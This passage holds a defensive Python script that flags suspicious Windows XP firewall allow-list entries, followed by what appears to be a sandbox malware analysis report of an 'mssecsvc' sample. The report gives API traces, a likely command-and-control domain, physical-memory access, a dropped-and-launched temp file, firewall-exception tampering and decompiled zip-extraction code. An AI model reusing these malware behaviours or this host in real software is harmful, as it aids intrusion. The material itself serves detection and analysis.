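def assess(entry: Dict[str, str], exists: Callable[[str], bool] = os.path.exists) -> List[str]:
    """Return the reasons an enabled allow-list entry deserves an analyst's attention."""
    path = entry.get("path")
    if path is None:
        return ["data does not follow path:scope:state:name: " + entry["raw"]]
    if entry["state"].lower() != "enabled":
        return []  # a disabled exception opens nothing
    reasons = []
    low = path.lower()
    if low != entry["value"].lower():
        reasons.append("value name and embedded path differ")
    if low.startswith(("c:\\windows", "%windir%", "%systemroot%")) and low not in KNOWN_SYSTEM_ENTRIES:
        reasons.append("unexpected binary under the Windows directory")
    if ntpath.basename(low) == entry["name"].lower():
        reasons.append("display name is just the file name (programmatically added)")
    if not exists(path):
        reasons.append("file is missing on disk")
    if reasons and entry["scope"] == "*":
        reasons.append("scope '*' admits inbound traffic from any address")
    return reasons


def find_suspicious(text: str, exists: Callable[[str], bool] = os.path.exists) -> Dict[str, List[str]]:
    """Map each suspicious value name to the reasons it was flagged."""
    findings = {}
    for entry in parse_reg_query(text):
        reasons = assess(entry, exists)
        if reasons:
            findings[entry["value"]] = reasons
    return findings


if __name__ == "__main__":
    for value, reasons in find_suspicious(SAMPLE_REG_QUERY, demo_exists).items():
        print(value)
        for reason in reasons:
            print("   -", reason)
```

On a live XP / Server 2003 host, feed the output of `reg query "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List"` to `find_suspicious` with the default `exists`; on Vista and later the firewall keeps its rules under the sibling `FirewallRules` key in a different format, so this parser does not apply there.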

                                                                                APIs
                                                                                • lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 00A84057
                                                                                • GetVersionExA.KERNEL32(?,?,00000000), ref: 00A840FB
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 00A841B4
                                                                                • CloseHandle.KERNEL32(?,00000000,6F6C6902,00A86AA2,00000000,00000000), ref: 00A841BD
                                                                                • GetTickCount.KERNEL32 ref: 00A841F6
                                                                                • Sleep.KERNEL32(00000064,?,00000000,6F6C6902,00A86AA2,00000000,00000000), ref: 00A8428B (0x64 = 100 ms)
                                                                                • GetTickCount.KERNEL32 ref: 00A84294
                                                                                • SetEvent.KERNEL32(?,?,00000000), ref: 00A842D6
                                                                                • Sleep.KERNEL32(00007530,?,00000000), ref: 00A842F7 (0x7530 = 30 000 ms between SetEvent and ResetEvent)
                                                                                • ResetEvent.KERNEL32(?,?,00000000), ref: 00A8430A
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.388703492.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_a80000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountEventSleepTick$CloseCreateHandleResetThreadVersionlstrlen
                                                                                • String ID:
                                                                                • API String ID: 1413472813-0
                                                                                • Opcode ID: 6b0defe1960dce2cb68afb5d2726ae1425874940fd6c70606eed0c1c35355a33
                                                                                • Instruction ID: a4f12dd37a02ff4de0b6b215c3db3096f4da777feb032e3557cbd41c8fa3624b
                                                                                • Opcode Fuzzy Hash: 6b0defe1960dce2cb68afb5d2726ae1425874940fd6c70606eed0c1c35355a33
                                                                                • Instruction Fuzzy Hash: 9871DE7150825ABAEF31AF24881D7EEBFADEF49310F140608E85A9E181D7F45F41C765
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 00A8344A
                                                                                • NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 00A83469 (class 0x0B = SystemModuleInformation, the list of loaded kernel modules)
                                                                                • MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 00A83493
                                                                                • CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 00A834A0
                                                                                • UnmapViewOfFile.KERNEL32(?), ref: 00A834B8
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.388703492.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_a80000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileView$CloseHandleInformationOpenQuerySectionSystemUnmap
                                                                                • String ID: \Device\PhysicalMemory
                                                                                • API String ID: 2985292042-2007344781
                                                                                • Opcode ID: e2b0c8f568571b3f59211b8063e335b2ad8ba4e779b6cb58c9455f457ca39783
                                                                                • Instruction ID: f8c4bebc67d6601d6ba6f0b13a5c45be8eaec49da6081769b17315f9ff9d74e3
                                                                                • Opcode Fuzzy Hash: e2b0c8f568571b3f59211b8063e335b2ad8ba4e779b6cb58c9455f457ca39783
                                                                                • Instruction Fuzzy Hash: CB817971500208FFEB249F15CC89AAA3BBCFF44B15F604658ED199B291D7F0AF458B64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 00A8344A
                                                                                • NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 00A83469 (class 0x0B = SystemModuleInformation, the list of loaded kernel modules)
                                                                                • MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 00A83493
                                                                                • CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 00A834A0
                                                                                • UnmapViewOfFile.KERNEL32(?), ref: 00A834B8
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.388703492.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_a80000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileView$CloseHandleInformationOpenQuerySectionSystemUnmap
                                                                                • String ID: ysic (fragment of \Device\PhysicalMemory: the 63697379 argument to NtOpenSection above is "ysic" read as little-endian bytes)
                                                                                • API String ID: 2985292042-20973071
                                                                                • Opcode ID: 75692eae59ef229a2f56f45455e385a3c03fd5a3a941212ab90a82f7e6085517
                                                                                • Instruction ID: 9bc6f851d5d847579ad691e1c666b5b2115b46a9f5d36429c8561fa637ab3aac
                                                                                • Opcode Fuzzy Hash: 75692eae59ef229a2f56f45455e385a3c03fd5a3a941212ab90a82f7e6085517
                                                                                • Instruction Fuzzy Hash: 01118F71140608FBEB34DF14CC59FAA367CEF88B04F50451CEA199B290E7F46F188A68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • lstrcpyW.KERNEL32(?,\BaseNamedObjects\npbtVt), ref: 00A824BA
                                                                                • lstrlenW.KERNEL32(?), ref: 00A824C1
                                                                                • NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,00000000), ref: 00A82516
                                                                                Strings
                                                                                • \BaseNamedObjects\npbtVt, xrefs: 00A824B8
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.388703492.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_a80000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateSectionlstrcpylstrlen
                                                                                • String ID: \BaseNamedObjects\npbtVt
                                                                                • API String ID: 2597515329-3914055295
                                                                                • Opcode ID: 1f6d0fdb519297aa2f4b2c942eb0fea1a6789580d20f20054a6c5e42652ba7e7
                                                                                • Instruction ID: 9f781ca1f05e39b826350c8bad57f2aa53861824959ece5f967ff4538a22a5d8
                                                                                • Opcode Fuzzy Hash: 1f6d0fdb519297aa2f4b2c942eb0fea1a6789580d20f20054a6c5e42652ba7e7
                                                                                • Instruction Fuzzy Hash: 100181B0781344BAF7309B29CC4BF5B7929DF81B50F508558F709AE1C4DAB89A0483A9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(00A83F83), ref: 00A83F8F
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 00A83FE9
                                                                                • CloseHandle.KERNEL32(?,00000000), ref: 00A83FF2
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 00A83FFF
                                                                                • lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 00A84057
                                                                                • GetVersionExA.KERNEL32(?,?,00000000), ref: 00A840FB
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 00A841B4
                                                                                • CloseHandle.KERNEL32(?,00000000,6F6C6902,00A86AA2,00000000,00000000), ref: 00A841BD
                                                                                • GetTickCount.KERNEL32 ref: 00A841F6
                                                                                • RtlExitUserThread.NTDLL(00000000), ref: 00A84322
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.388703492.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_a80000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateThread$CloseHandle$CountEventExitLibraryLoadTickUserVersionlstrlen
                                                                                • String ID: ilo.brenz.pl
                                                                                • API String ID: 2802001013-878173267
                                                                                • Opcode ID: ee4b1f535ca79d9535994823dd2765b1aa6c936bb005bd660b800cb5032af16f
                                                                                • Instruction ID: 86bf04ff36d97d4c71ad8e6cee8a3a8d5b7e30b93e45b2e47be838ff3dd2b2f0
                                                                                • Opcode Fuzzy Hash: ee4b1f535ca79d9535994823dd2765b1aa6c936bb005bd660b800cb5032af16f
                                                                                • Instruction Fuzzy Hash: F991DD7150824ABAEB31AF24881DBEE7FADEF49301F040608E99A9E181D3F45F45CB65
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(00A83EA9), ref: 00A83EB5
                                                                                  • Part of subcall function 00A83ECC: GetProcAddress.KERNEL32(00000000,00A83EC0), ref: 00A83ECD
                                                                                  • Part of subcall function 00A83ECC: GetModuleFileNameA.KERNEL32(00000000,00A86AA2,000000C8), ref: 00A83EE2
                                                                                  • Part of subcall function 00A83ECC: CreateThread.KERNEL32(00000000,00000000,00A83691,00000000,00000000), ref: 00A83F40
                                                                                  • Part of subcall function 00A83ECC: CloseHandle.KERNEL32(?,6EF1083C), ref: 00A83F49
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 00A83FE9
                                                                                • CloseHandle.KERNEL32(?,00000000), ref: 00A83FF2
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 00A83FFF
                                                                                • GetVersionExA.KERNEL32(?,?,00000000), ref: 00A840FB
                                                                                Strings
                                                                                • SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00A83F0C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.388703492.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_a80000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Create$CloseHandleThread$AddressEventFileLibraryLoadModuleNameProcVersion
                                                                                • String ID: SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
                                                                                • API String ID: 4113580538-621207024
                                                                                • Opcode ID: 9f06b138147dde36dface2e64d8b648724a67120387ec8aabe41be75442747ba
                                                                                • Instruction ID: 60b97a96ad4cc42de0a757e0d97cb49ba06ba6bb092f85f9f4d409b46830160c
                                                                                • Opcode Fuzzy Hash: 9f06b138147dde36dface2e64d8b648724a67120387ec8aabe41be75442747ba
                                                                                • Instruction Fuzzy Hash: C2A1EF72408249BFEB21AF248C5EBEA7FACEF45700F044649F9498E082D6F45F45C7A5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetProcAddress.KERNEL32(00000000,00A83EC0), ref: 00A83ECD
                                                                                • GetModuleFileNameA.KERNEL32(00000000,00A86AA2,000000C8), ref: 00A83EE2
                                                                                • CreateThread.KERNEL32(00000000,00000000,00A83691,00000000,00000000), ref: 00A83F40
                                                                                • CloseHandle.KERNEL32(?,6EF1083C), ref: 00A83F49
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 00A83FE9
                                                                                • CloseHandle.KERNEL32(?,00000000), ref: 00A83FF2
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 00A83FFF
                                                                                  • Part of subcall function 00A83405: NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 00A8344A
                                                                                  • Part of subcall function 00A83405: NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 00A83469
                                                                                  • Part of subcall function 00A83405: MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 00A83493
                                                                                  • Part of subcall function 00A83405: CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 00A834A0
                                                                                  • Part of subcall function 00A83405: UnmapViewOfFile.KERNEL32(?), ref: 00A834B8
                                                                                Strings
                                                                                • SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00A83F0C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.388703492.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_a80000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseCreateFileHandle$ThreadView$AddressEventInformationModuleNameOpenProcQuerySectionSystemUnmap
                                                                                • String ID: SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
                                                                                • API String ID: 3400179232-621207024
                                                                                • Opcode ID: 3176691832235144c822bda6bdece0b9c65d83022bcced3ec1f9b4779e38ef98
                                                                                • Instruction ID: 1a874cc303d71709398dc7fe8c8f23a86968613d4148dc8e28cc0ff437744e7b
                                                                                • Opcode Fuzzy Hash: 3176691832235144c822bda6bdece0b9c65d83022bcced3ec1f9b4779e38ef98
                                                                                • Instruction Fuzzy Hash: D7A1E072508259BFEB21AF24CC5EBEA7BACEF45300F044649F8499E081E6F46F45C7A5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(00A83F54), ref: 00A83F60
                                                                                  • Part of subcall function 00A83F8F: LoadLibraryA.KERNEL32(00A83F83), ref: 00A83F8F
                                                                                  • Part of subcall function 00A83F8F: CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 00A83FE9
                                                                                  • Part of subcall function 00A83F8F: CloseHandle.KERNEL32(?,00000000), ref: 00A83FF2
                                                                                  • Part of subcall function 00A83F8F: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 00A83FFF
                                                                                  • Part of subcall function 00A83F8F: GetVersionExA.KERNEL32(?,?,00000000), ref: 00A840FB
                                                                                • lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 00A84057
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 00A841B4
                                                                                • CloseHandle.KERNEL32(?,00000000,6F6C6902,00A86AA2,00000000,00000000), ref: 00A841BD
                                                                                • GetTickCount.KERNEL32 ref: 00A841F6
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.388703492.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_a80000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Create$CloseHandleLibraryLoadThread$CountEventTickVersionlstrlen
                                                                                • String ID:
                                                                                • API String ID: 2925003024-0
                                                                                • Opcode ID: 98c4dc3622c81e610166b3295d4bccfe550f8d2832964dac318e74891848542e
                                                                                • Instruction ID: 917e7c3747ee5ab01a919b876377117f209b175af149b6bd464110256128bfb6
                                                                                • Opcode Fuzzy Hash: 98c4dc3622c81e610166b3295d4bccfe550f8d2832964dac318e74891848542e
                                                                                • Instruction Fuzzy Hash: 1781F071508259BFEB21AF348C5DBEA7FACEF45310F040658E8898E182D2F45F45C762
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetTempPathA.KERNEL32(00000104), ref: 00A8278C
                                                                                  • Part of subcall function 00A827A7: GetTempFileNameA.KERNEL32(?,00A827A3,00000000,?), ref: 00A827A8
                                                                                  • Part of subcall function 00A827A7: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,?,00A827A3,00000000,?), ref: 00A827C3
                                                                                  • Part of subcall function 00A827A7: WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000104,?,00000000,?,00A827A3,00000000,?), ref: 00A827F3
                                                                                  • Part of subcall function 00A827A7: CloseHandle.KERNEL32(?,00000104,?,00000000,?,00A827A3,00000000,?), ref: 00A827FF
                                                                                  • Part of subcall function 00A827A7: CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000104,?,00000000,?,00A827A3), ref: 00A82823
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.388703492.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_a80000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CreateTemp$CloseHandleNamePathProcessWrite
                                                                                • String ID:
                                                                                • API String ID: 3982275768-0
                                                                                • Opcode ID: 2d38deb6aefaf5fafd3701ae89f7df2c8b85ad1d9cd8c4e8e23ab3e50bde978c
                                                                                • Instruction ID: 037299d7ff9a6957ff75b9c7b1e999953bbd54de474f5e15e2a2738386f37410
                                                                                • Opcode Fuzzy Hash: 2d38deb6aefaf5fafd3701ae89f7df2c8b85ad1d9cd8c4e8e23ab3e50bde978c
                                                                                • Instruction Fuzzy Hash: E021AFB1144206BFE7216B21CC8EFFF7A2DEF95B10F000529FA4999082D7B19E5587B6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetTempFileNameA.KERNEL32(?,00A827A3,00000000,?), ref: 00A827A8
                                                                                • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,?,00A827A3,00000000,?), ref: 00A827C3
                                                                                • WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000104,?,00000000,?,00A827A3,00000000,?), ref: 00A827F3
                                                                                • CloseHandle.KERNEL32(?,00000104,?,00000000,?,00A827A3,00000000,?), ref: 00A827FF
                                                                                • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000104,?,00000000,?,00A827A3), ref: 00A82823
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.388703492.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_a80000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$Create$CloseHandleNameProcessTempWrite
                                                                                • String ID:
                                                                                • API String ID: 463619559-0
                                                                                • Opcode ID: bbf5c5561a5178fb7ef464295b4b729c13e68fcf671b41c3dcb44b7c67eff673
                                                                                • Instruction ID: d5626a4c4e84ee79db7dcc049fbb365618b369fde020026eace35120b98ab0f4
                                                                                • Opcode Fuzzy Hash: bbf5c5561a5178fb7ef464295b4b729c13e68fcf671b41c3dcb44b7c67eff673
                                                                                • Instruction Fuzzy Hash: 8D116DB1100606BBEB251B21CC4AFFB7A2DEF94B10F004519FA0699080DBF59E5196A8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(0019FE90), ref: 00A8113D
                                                                                • GetProcAddress.KERNEL32(00000000,00A811D6), ref: 00A81148
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.388703492.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_a80000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: .DLL
                                                                                • API String ID: 1646373207-899428287
                                                                                • Opcode ID: 82aecbdba2b6c313781f1a35b90d956a9f8d4ce40e6713e346beece58f6b0b34
                                                                                • Instruction ID: 616aa10682b1015e67deb05c9b4bf70b6b0e21a0ca3b51cd5b3f9e8d82d0985f
                                                                                • Opcode Fuzzy Hash: 82aecbdba2b6c313781f1a35b90d956a9f8d4ce40e6713e346beece58f6b0b34
                                                                                • Instruction Fuzzy Hash: 5E01C030A07000EA8F64BF6CCC4DAEA7B7CEF04351F004218EA1A8B256C7708E828795
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 75%
                                                                                			E00406C40(intOrPtr* __ecx, void* __edx, intOrPtr _a4, void* _a8, signed int _a11) {
                                                                                				signed int _v5;
                                                                                				signed char _v10;
                                                                                				char _v11;
                                                                                				char _v12;
                                                                                				char _v16;
                                                                                				char _v20;
                                                                                				intOrPtr* _v24;
                                                                                				struct _FILETIME _v32;
                                                                                				struct _FILETIME _v40;
                                                                                				char _v44;
                                                                                				unsigned int _v72;
                                                                                				intOrPtr _v96;
                                                                                				intOrPtr _v100;
                                                                                				unsigned int _v108;
                                                                                				unsigned int _v124;
                                                                                				char _v384;
                                                                                				char _v644;
                                                                                				char _t142;
                                                                                				char _t150;
                                                                                				void* _t151;
                                                                                				signed char _t156;
                                                                                				long _t173;
                                                                                				signed char _t185;
                                                                                				signed char* _t190;
                                                                                				signed char* _t194;
                                                                                				intOrPtr* _t204;
                                                                                				signed int _t207;
                                                                                				signed int _t208;
                                                                                				intOrPtr* _t209;
                                                                                				unsigned int _t210;
                                                                                				char _t212;
                                                                                				signed char _t230;
                                                                                				signed int _t234;
                                                                                				signed char _t238;
                                                                                				void* _t263;
                                                                                				unsigned int _t264;
                                                                                				signed int _t269;
                                                                                				signed int _t270;
                                                                                				signed int _t271;
                                                                                				intOrPtr _t272;
                                                                                				char* _t274;
                                                                                				unsigned int _t276;
                                                                                				signed int _t277;
                                                                                				void* _t278;
                                                                                				intOrPtr* _t280;
                                                                                				void* _t281;
                                                                                				intOrPtr _t282;
                                                                                
                                                                                				_t263 = __edx;
                                                                                				_t213 = __ecx;
                                                                                				_t272 = _a4;
                                                                                				_t208 = _t207 | 0xffffffff;
                                                                                				_t280 = __ecx;
                                                                                				_v24 = __ecx;
                                                                                				if(_t272 < _t208) {
                                                                                					L61:
                                                                                					return 0x10000;
                                                                                				}
                                                                                				_t131 =  *__ecx;
                                                                                				if(_t272 >=  *((intOrPtr*)( *__ecx + 4))) {
                                                                                					goto L61;
                                                                                				}
                                                                                				if( *((intOrPtr*)(__ecx + 4)) != _t208) {
                                                                                					E00406A97(_t131);
                                                                                					_pop(_t213);
                                                                                				}
                                                                                				 *(_t280 + 4) = _t208;
                                                                                				if(_t272 !=  *((intOrPtr*)(_t280 + 0x134))) {
                                                                                					if(_t272 != _t208) {
                                                                                						_t132 =  *_t280;
                                                                                						if(_t272 >=  *( *_t280 + 0x10)) {
                                                                                							L12:
                                                                                							_t133 =  *_t280;
                                                                                							if( *( *_t280 + 0x10) >= _t272) {
                                                                                								E004064BB( *_t280,  &_v124,  &_v384, 0x104, 0, 0, 0, 0);
                                                                                								if(L0040657A(_t213, _t263,  *_t280,  &_v44,  &_v20,  &_v16) == 0) {
                                                                                									_t142 = E00405D0E( *((intOrPtr*)( *_t280)), _v20, 0);
                                                                                									if(_t142 != 0) {
                                                                                										L19:
                                                                                										return 0x800;
                                                                                									}
                                                                                									_push(_v16);
                                                                                									L00407700();
                                                                                									_v12 = _t142;
                                                                                									if(L00405D8A(_t142, 1, _v16,  *((intOrPtr*)( *_t280))) == _v16) {
                                                                                										_t281 = _a8;
                                                                                										 *_t281 =  *( *_t280 + 0x10);
                                                                                										strcpy( &_v644,  &_v384);
                                                                                										_t209 = __imp___mbsstr;
                                                                                										_t274 =  &_v644;
                                                                                										while(1) {
                                                                                											L21:
                                                                                											_t150 =  *_t274;
                                                                                											if(_t150 != 0 && _t274[1] == 0x3a) {
                                                                                												break;
                                                                                											}
                                                                                											if(_t150 == 0x5c || _t150 == 0x2f) {
                                                                                												_t274 =  &(_t274[1]);
                                                                                												continue;
                                                                                											} else {
                                                                                												_t151 =  *_t209(_t274, "\\..\\");
                                                                                												if(_t151 != 0) {
                                                                                													L31:
                                                                                													_t39 = _t151 + 4; // 0x4
                                                                                													_t274 = _t39;
                                                                                													continue;
                                                                                												}
                                                                                												_t151 =  *_t209(_t274, "\\../");
                                                                                												if(_t151 != 0) {
                                                                                													goto L31;
                                                                                												}
                                                                                												_t151 =  *_t209(_t274, "/../");
                                                                                												if(_t151 != 0) {
                                                                                													goto L31;
                                                                                												}
                                                                                												_t151 =  *_t209(_t274, "/..\\");
                                                                                												if(_t151 == 0) {
                                                                                													strcpy(_t281 + 4, _t274);
                                                                                													_t264 = _v72;
                                                                                													_a11 = _a11 & 0x00000000;
                                                                                													_v5 = _v5 & 0x00000000;
                                                                                													_t156 = _t264 >> 0x0000001e & 0x00000001;
                                                                                													_t230 =  !(_t264 >> 0x17) & 0x00000001;
                                                                                													_t276 = _v124 >> 8;
                                                                                													_t210 = 1;
                                                                                													if(_t276 == 0 || _t276 == 7 || _t276 == 0xb || _t276 == 0xe) {
                                                                                														_a11 = _t264 >> 0x00000001 & 0x00000001;
                                                                                														_t230 = _t264 & 0x00000001;
                                                                                														_v5 = _t264 >> 0x00000002 & 0x00000001;
                                                                                														_t156 = _t264 >> 0x00000004 & 0x00000001;
                                                                                														_t264 = _t264 >> 0x00000005 & 0x00000001;
                                                                                														_t210 = _t264;
                                                                                													}
                                                                                													_t277 = 0;
                                                                                													 *(_t281 + 0x108) = 0;
                                                                                													if(_t156 != 0) {
                                                                                														 *(_t281 + 0x108) = 0x10;
                                                                                													}
                                                                                													if(_t210 != 0) {
                                                                                														 *(_t281 + 0x108) =  *(_t281 + 0x108) | 0x00000020;
                                                                                													}
                                                                                													if(_a11 != 0) {
                                                                                														 *(_t281 + 0x108) =  *(_t281 + 0x108) | 0x00000002;
                                                                                													}
                                                                                													if(_t230 != 0) {
                                                                                														 *(_t281 + 0x108) =  *(_t281 + 0x108) | 0x00000001;
                                                                                													}
                                                                                													if(_v5 != 0) {
                                                                                														 *(_t281 + 0x108) =  *(_t281 + 0x108) | 0x00000004;
                                                                                													}
                                                                                													 *((intOrPtr*)(_t281 + 0x124)) = _v100;
                                                                                													 *((intOrPtr*)(_t281 + 0x128)) = _v96;
                                                                                													_v40.dwLowDateTime = E00406B23(_v108 >> 0x10, _v108);
                                                                                													_v40.dwHighDateTime = _t264;
                                                                                													LocalFileTimeToFileTime( &_v40,  &_v32);
                                                                                													_t173 = _v32.dwLowDateTime;
                                                                                													_t234 = _v32.dwHighDateTime;
                                                                                													_t212 = _v12;
                                                                                													 *(_t281 + 0x10c) = _t173;
                                                                                													 *(_t281 + 0x114) = _t173;
                                                                                													 *(_t281 + 0x11c) = _t173;
                                                                                													 *(_t281 + 0x110) = _t234;
                                                                                													 *(_t281 + 0x118) = _t234;
                                                                                													 *(_t281 + 0x120) = _t234;
                                                                                													if(_v16 <= 4) {
                                                                                														L57:
                                                                                														if(_t212 != 0) {
                                                                                															_push(_t212);
                                                                                															L004076E8();
                                                                                														}
                                                                                														_t282 = _v24;
                                                                                														memcpy(_t282 + 8, _t281, 0x12c);
                                                                                														 *((intOrPtr*)(_t282 + 0x134)) = _a4;
                                                                                														goto L60;
                                                                                													} else {
                                                                                														while(1) {
                                                                                															_v12 =  *((intOrPtr*)(_t277 + _t212));
                                                                                															_v10 = _v10 & 0x00000000;
                                                                                															_v11 =  *((intOrPtr*)(_t212 + _t277 + 1));
                                                                                															_a8 =  *(_t212 + _t277 + 2) & 0x000000ff;
                                                                                															if(strcmp( &_v12, "UT") == 0) {
                                                                                																break;
                                                                                															}
                                                                                															_t277 = _t277 + _a8 + 4;
                                                                                															if(_t277 + 4 < _v16) {
                                                                                																continue;
                                                                                															}
                                                                                															goto L57;
                                                                                														}
                                                                                														_t238 =  *(_t277 + _t212 + 4) & 0x000000ff;
                                                                                														_t185 = _t238 >> 0x00000001 & 0x00000001;
                                                                                														_t278 = _t277 + 5;
                                                                                														_a11 = _t185;
                                                                                														_v5 = _t238 >> 0x00000002 & 0x00000001;
                                                                                														if((_t238 & 0x00000001) != 0) {
                                                                                															_t271 =  *(_t278 + _t212 + 1) & 0x000000ff;
